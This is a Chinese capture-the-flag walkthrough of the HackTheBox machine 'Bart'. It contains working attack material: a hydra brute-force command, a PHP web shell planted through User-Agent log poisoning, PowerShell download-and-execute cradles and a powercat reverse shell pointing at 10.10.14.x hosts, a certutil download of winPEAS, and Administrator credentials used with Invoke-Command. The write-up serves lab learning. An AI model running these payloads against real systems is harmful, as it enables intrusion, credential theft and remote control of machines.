Hackthebox-Bart(考点:信息搜集/密码猜解/user-agent注入/window账号利用)
1、 nmap搞起
2、信息搜集&密码猜解
显示forum.bart.htb,把bart和forum.bart都加到/etc/host
里去: 10.10.10.81 forum.bart.htb bart.htb
就一个80端口,进去看看网页,
没啥,ctrl+u看网页源码
在330多行 ,有他们好几个员工的邮箱,这些可以用来做登录信息,但是现在还没发现哪里登录
于是,扫bart.htb
和 forum.bart.htb
目录看是否有登陆点,过程很慢, 前者搜到monitor
进去就是登录框,不是很稳定,看到地址栏变成monitor.bart.htb,加进/etc/host
,就稳定些
可以试试那几个员工信息,在forget passwords里,随便输入个不相关信息,当然不行,但是输入其中的员工harvey,提示已发重置密码邮件,这就说明harvey帐号是存在的.这个员工全名还有一个potter,尝试输入,直接登录成功.当然,也可以用burp/hydra等破解
进入后看到又是新的dns,
继续添加进host : 10.10.10.81 forum.bart.htb bart.htb monitor.bart.htb internal-01.bart.htb
网页点击internal-01.bart.htb
又是登录框,
这回老密码不好使了,还提示密码8位以上,只好暴力干他
把rockyou剪切成只保留8位以上的
sed -nr '/^.{8,150}$/p' /usr/share/wordlists/rockyou.txt > rockyou8.txt
hydra解密,因为随便输入8位以上报错信息为invalid那句,所以末尾加上这句话
hydra -l harvey -P rockyou8.txt -t 60 internal-01.bart.htb http-form-post "/simple_chat/login.php:uname=^USER^&passwd=^PASS^&submit=Login:F=Invalid Username or Password"
OK,登进去
几个不痛不痒的对话,也看不出啥来,还是ctrl+u
看到这个链接,点开
看到filename=,username=什么这种,就很容易想到注入&文件包含,我自己伪造个shell文件,它就会执行.
前面的选项一个个删,看看如何,点击后都报错
删到只有log.txt,
3、user-agent注入
这里显示浏览器User-agent,说明是有log.txt的,文件里保存着agent的信息,
或许这里可以user-agent注入?或许可以把log.txt换掉,比如换成shell.php?
user-agent试试<?php echo shell_exec($_GET['c'].' 2>&1'); ?>
发送repeater然后send
接着测试
http://internal-01.bart.htb/log/shell.php?c=whoami
ok成功输出,证明有效
那可以在这里直接输入命令了,看之前的扫描是windows,直接用powershell方便快捷
http://internal-01.bart.htb/log/shell.php?c=powershell%20iex(new-object%20net.webclient).downloadstring(%27http://10.10.14.57/Invoke-PowerShellTcp.ps1%27)
之前的chatterbox靶机文章有写了windows,invoke-powershell的弹shell方法.
收到.
不过这个powershell真不好用,什么都报错
只好用powercat再转个普通cmd的shell出来IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.15/powercat.ps1');powercat -c 10.10.14.15 -p 31337 -e cmd
。
powercat在github有很多下载的
4、提权
收到搞定.爽歪歪,赶紧用windows的信息搜集技巧看有没账户密码信息,或者此处用powerup.ps1自动扫.这里再用powershell命令倒是舒畅很多!
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
或者用winpeas也可以下载
certutil -urlcache -split -f http://10.10.14.15/winPEAS.exe 666.exe
输入运行C:\inetpub\wwwroot\internal-01\log\666.exe
这信息太明显的,比chatterbox那台机子更明显,直接就是admin了.可以参照chatbox那台机子用impacket包里的psexec.py弹最高shell.这个机子一样也是445开在了内部,照着chatterbox那样转发出来。只不过这个靶机是64版的,所以chisel用64位
也可以参照chatterbox第二种方法。或者稍微改动优化,一个命令搞定(和chatbox一样,弹新shell文件我还是用的2.ps1,端口4445)
当然这只能弹admin的shell,system的才是最高。所以第一种更牛。
powershell.exe -c "$user='WORKGROUP\Administrator'; $pass='3130438f31186fbaf962f407711faddb'; try { Invoke-Command -ScriptBlock { iex(New-Object Net.WebClient).DownloadString('http://10.10.14.57/2.ps1') } -ComputerName BART -Credential (New-Object System.Management.Automation.PSCredential $user,(ConvertTo-SecureString $pass -AsPlainText -Force)) } catch { echo $_.Exception.Message }" 2>&1"
另外4445监听收到,搞定.总结windows机子喜欢考这个账户信息利用
Hackthebox-Bart(考点:信息搜集/密码猜解/user-agent注入/window账号利用)相关推荐
- ssh被暴力猜解登录密码,利用pandas简单分析ssh登录失败记录
本人为了学习和使用VPS因此手中长期配置一到两台VPS,没想到这点苍蝇肉也成了黑客眼里的肥肉. 近来一个月发现被人正在暴力猜解ssh登录密码,心想,这准是有人想要拿shell想要把这点苍蝇肉都想占为己 ...
- 红队笔记之内网信息搜集技术要点总结
在渗透测试中信息收集的深度与广度以及对关键信息的提取与关联,将影响渗透的质量.下文对整体技术要点进行总结. 1.明确要收集的内容: 2.分析要收集内容可能存储在系统的什么位置(收集方法): 3.明确收 ...
- vulnhub - digitalworld.local: MERCY v2 (考点:信息搜集 smb 端口敲门 RIPS tomcat linux 提权)
https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了 nmap ...
- 网络安全实验1 敏感信息搜集与密码心理分析
赞赏码 & 联系方式 & 个人闲话 [实验名称]敏感信息搜集与密码心理分析 [实验目的] 1.理解社会工程学的概念,掌握获取敏感信息的方法 2.提高自我信息保护的意识和方法 3.理解密 ...
- fcrackzip猜解zip密码
用fcrackzip可以很方便的破.解zip,它提供暴力穷举和字典破 解等功能 fcrackzip安装 linux没有安装fcrackzip可以命令安装 mac安装 brew install fcra ...
- mysql路径猜解_猜解数据库(MYSQL)信息
1 importrequests2 3 ################################################################# 4 #http://43.2 ...
- 2018-2019-2 20165315《网络攻防技术》Exp6 信息搜集与漏洞扫描
2018-2019-2 20165315<网络攻防技术>Exp6 信息搜集与漏洞扫描 目录 一.实验内容 二.实验步骤 1.各种搜索技巧的应用 2.DNS IP注册信息的查询 3.基本的扫 ...
- 20155339 Exp6 信息搜集与漏洞扫描
20155339 Exp6 信息搜集与漏洞扫描 实验后回答问题 (1)哪些组织负责DNS,IP的管理. 全球根服务器均由美国政府授权的ICANN统一管理,负责全球的域名根服务器.DNS和IP地址管理. ...
- 20155201 网络攻防技术 实验六 信息搜集与漏洞
20155201 网络攻防技术 实验六 信息搜集与漏洞 一.实践内容 各种搜索技巧的应用 DNS IP注册信息的查询 基本的扫描技术:主机发现.端口扫描.OS及服务版本探测.具体服务的查点 漏洞扫描: ...
最新文章
- chrome jssip
- Linux vim打开文件的四种方式
- c++ 协程_Python3 协程(coroutine)介绍
- 红皮书:变量、作用域和内存问题(四)
- 聊聊、Spring 第二篇
- Codeforces Round #666 (Div. 2)C - Multiples of Length(错位相减)
- iOS 控制器View加载顺序详细版
- 仿写京东商品详情页面
- win7 正在锁定计算机 卡住,win7系统安装卡在正在启动windows界面的解决方法
- Nebula Graph - 集群模式部署
- 倩女幽魂偃师技能攻略介绍:偃师技能怎么玩?
- 怎么把做好的网页用deramweaver传上互联网 空间和域名怎么申请
- PAT 乙级 1058 选择题 python
- python中的turtle库中引用_python turtle库学习笔记
- 成都超级计算机中心玻璃,全球前十的成都超算中心计算能力大比拼!看看它到底有多厉害?...
- 行业短信应用的类型与短信模板
- 产品、测试与开发如何协作
- 金 融 量 化 分 析 • JoinQuant • 第 四 篇
- Altium designer PCB走线包地处理 教程
- 「开发者说」“游戏化管理”上钉钉,关于悦积分的应用开发故事
热门文章
- 406 “Z”型矩阵 思维+树状数组 [代码源][namomo spring camp]每日一题div1
- Windows下载安装Python3.5.2(32位操作系统)
- 一个Axis2 + eclipse开发Web服务的例子SayHi
- 织梦mysql安装教程_新手教程:DedeCmsV5.7 SP1详细安装步骤(2)
- 【西瓜书笔记】8. EM算法(上)
- 鸢尾花数据集、月亮数据集二分类可视化分析
- 超细的CSS学习笔记(CSS详解)
- PaddleDetection——水果分类项目实战
- mongodb和mysql的使用场景_mongodb 使用场景和不使用场景
- Grammarly安装